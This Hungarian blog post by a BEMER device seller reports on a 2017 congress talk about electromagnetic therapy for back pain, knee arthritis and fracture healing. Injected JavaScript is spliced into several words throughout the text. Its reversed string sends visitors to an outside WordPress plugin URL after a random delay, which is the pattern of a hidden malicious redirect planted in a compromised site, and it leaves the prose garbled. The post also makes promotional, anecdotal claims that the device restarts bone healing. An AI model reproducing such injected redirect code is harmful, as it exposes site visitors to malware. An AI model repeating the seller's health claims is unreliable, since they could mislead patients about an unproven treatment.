2017. szeptemberi Nemzetközi BEMER Kongresszus

BEMER kezelés mozgásszervi betegekenKözel 10 éve foglalkozom BEMER terápiás tanácsadással, készülékek forgalmazásával és bérbeadásával. Mindig izgalmas volt látni, hogy az orvosi eset tanulmányok és vizsgálatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tok, tapasztalatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tok gyűlnek, ami segíti a tényszerű orvoslás ( Evidence Based Medicine ) kritériumainak egyre szélesebb körű megfelelésének. Egy olyan tanulmány ismertetése történt Prof. Dr. Bender Tamás által a kongresszuson, amely szerepel a www. pubmed.com tanulmányai között is és tudományosnak tekinthető, hiszen randomizált kettős vak módszerrel történt.

Mint ismeretes az elektromágneses térben történő kezelést évszázadok óta használják gyógyításra. Az 1960-as években Basset kallusképződés (csontoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tosodást) serkentő hatást igazolt, mint laboratóriumi mind pedig az élő szervezetben, azaz a csontképző sejtekre (osteoblast) pozitív hatással volt. A fizikoterápiának ez egy olyan ága, amely jelentősen megosztja az orvos társadalmat. A saját illetve betegeink tapasztalata azonban csontoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tosodás tekintetében egyértelműen pozitív. Több betegünk is van, akik csonttörés után azt tapasztalták, hogy a csontoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tosodás nem indult meg. Ezek a betegek csak a kezelő orvosuk ajánlására kezdték el a BEMER készüléket használni. Sokakat – érthető módon csak az győzött meg, amikor az első röntgennél a saját szemükkel láthatták, hogy a korábban problémás csontoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tosodás megindult és később, egyéb beavatkozás nélkül összeforrt a csontjuk. A BEMER készülék speciális paraméterekkel működik, azaz a „gyenge” elektromágneses tér csak egy vivőanyag, erre egy speciális pulzáló jelet fejlesztettek ki ( BEMER jel ) melynek Klip tanár úr vizsgálata és tapasztalatai alapján elsődleges hatása a szöveti mikrocirkuláció javítása.
Csont szerkezete
Prof. Dr. Bender Tamás és kollégái vizsgálatában 50 krónikus derékfájdalomban és 50 térdartrózisban szenvedő beteg vett részt.
CsontszerkezetA vizsgálat célja az volt, hogyan hat a BEMER a vizsgálatban résztvevő betegekre fájdalom, fáradtségérzet és életminőség szempontjából. Jelen blogban a teljes orvosi módszertant nem ismertetem. A vizsgálat végkövetkeztetése szerint Prof. Dr. Bender Tamás elmondta, hogy a BEMER fizikai érterápia rövidtávon csökkentette a fájdalmat és a fáradtségérzetet krónikus derékfájós betegeken, de hosszú távú hatáshoz tartós alkalmazás szükséges, míg térdartrózis esetén a hosszútávú kezelés tűnik hasznosnak. Az előadás nagyon élvezetes volt, humoros képekkel illusztrálva, segítve a jobb megértést.